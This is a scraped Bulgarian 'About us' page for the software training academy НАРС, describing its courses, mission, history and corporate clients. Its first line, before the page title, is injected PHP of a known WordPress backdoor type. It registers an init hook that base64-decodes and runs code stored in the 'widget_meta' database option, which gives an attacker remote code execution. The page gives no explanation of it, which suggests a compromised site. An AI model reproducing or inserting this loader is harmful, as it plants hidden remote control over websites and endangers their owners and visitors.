add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); За НАРС - НАРС

За НАРС

Националната академия за Разработка на софтуер е частен център за професионално обучение, лицензиран Национална агенция за професионално образование и обучение. Академията предлага най-съвременните курсове за обучение в областта на разработката на софтуер в България. НАРС съчетава най-доброто от академичните среди и частния сектор, с цел да се създаде най-прогресивната и съвременна среда за обучение. Крайната цел на академията е да подготви високо мотивирани професионалисти, които след това да навлязат в реалния работен процес.

Нашите услуги

Националната академия за разработка на софтуер осигурява на своите клиенти високо качествени и професионални услуги:

  • Уникални обучения за ИТ специалисти
  • Обучения по поръчка на клиенти
  • Обучение и изграждане на екипи
  • Корпоративни решения
  • HR услуги
  • Професионална сертификация

Заедно с провежданите обучения НАРС има значителен опит и принос в организирането на семинари, конференции и различни видове инициативи.

Мисия

Основната философия на компанията се гради на факта да предоставяме продукти от най-високо качество и да се отнасяме с внимание и уважение към всеки клиент. Ние постоянно се стремим да подобряваме нашите услуги и продукти, от една страна, и създаване на атмосфера, където талантливите служители могат да се развиват и усъвършенстват.

История

Националната академия по разработка на софтуер е създадена през 2004 г. и е лицензирана от Министерството на образованието и науката. В академията са се обучили над 1200 студенти в 23 различни видове курсове, като над 2500 са кандидатствалите за тях. До момента имаме успешни бизнес отношения с повече от 70 корпоративни клиенти. Някои от тях са: SAP Labs Bulgaria, “Мобилтел” (част от Vodafone Group), Johnson Controls Electronics Bulgaria, Fadata, VMware, Societe General Expresbank, Telerik и др.
От 2009 г. Националната академия за разработка на софтуер е част от Sun Academic Initiative на Sun Microsystems и официален тестов център на Prometric.

Нашият екип

Академията разполага с голям екип от опитни софтуерни разработчици. Всеки специалист се стреми да изпълни интересите както на нашата компания, така и на нашите кандидати и клиенти. За да се чувстват комфортно ние предлагаме на нашите служители приятна и динамична среда, в която да могат да постигнат и развият своите професионални цели.

Нашите зали

Зала 3 Зала 3 Зала 4
Зала 2 Зала 1 Зала 1

Oбщи Условия

Общи Условия на центъра

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad